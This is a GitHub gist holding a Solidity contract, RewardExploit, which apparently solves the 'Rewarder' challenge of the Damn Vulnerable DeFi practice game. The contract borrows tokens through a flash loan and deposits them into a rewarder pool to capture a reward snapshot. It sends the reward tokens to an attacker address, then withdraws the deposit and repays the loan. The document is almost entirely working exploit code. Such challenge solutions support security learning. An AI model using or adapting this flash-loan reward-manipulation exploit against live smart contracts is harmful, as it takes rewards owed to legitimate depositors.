Skip to content

Instantly share code, notes, and snippets.

@az0mb13
Created January 29, 2023 08:07
Show Gist options
  • Save az0mb13/1940d5db7a6fb77ebde23c5d956b8a05 to your computer and use it in GitHub Desktop.
Save az0mb13/1940d5db7a6fb77ebde23c5d956b8a05 to your computer and use it in GitHub Desktop.
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;
interface IFlashLoanerPool {
function flashLoan(uint256 amount) external;
}
interface IDamnValuableToken {
function transfer(address recipient, uint256 amount)
external
returns (bool);
function approve(address spender, uint256 amount) external returns (bool);
}
interface IRewarderPool {
function deposit(uint256 amountToDeposit) external;
function withdraw(uint256 amountToWithdraw) external;
}
interface IRewardToken {
function transfer(address recipient, uint256 amount)
external
returns (bool);
function balanceOf(address account) external view returns (uint256);
}
contract RewardExploit {
address immutable attacker;
IFlashLoanerPool immutable flashLoanerPool;
IDamnValuableToken immutable liquidityToken;
IRewarderPool immutable rewarderPool;
IRewardToken immutable rewardToken;
constructor(
address _attacker,
address _flashLoanerPool,
address _liquidityToken,
address _rewarderPool,
address _rewardToken
) public {
attacker = _attacker;
flashLoanerPool = IFlashLoanerPool(_flashLoanerPool);
liquidityToken = IDamnValuableToken(_liquidityToken);
rewarderPool = IRewarderPool(_rewarderPool);
rewardToken = IRewardToken(_rewardToken);
}
function exploit(uint256 _amount) external {
flashLoanerPool.flashLoan(_amount);
}
function receiveFlashLoan(uint256 amount) external {
liquidityToken.approve(address(rewarderPool), amount);
rewarderPool.deposit(amount);
rewardToken.transfer(attacker, rewardToken.balanceOf(address(this)));
rewarderPool.withdraw(amount);
liquidityToken.transfer(address(flashLoanerPool), amount);
}
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment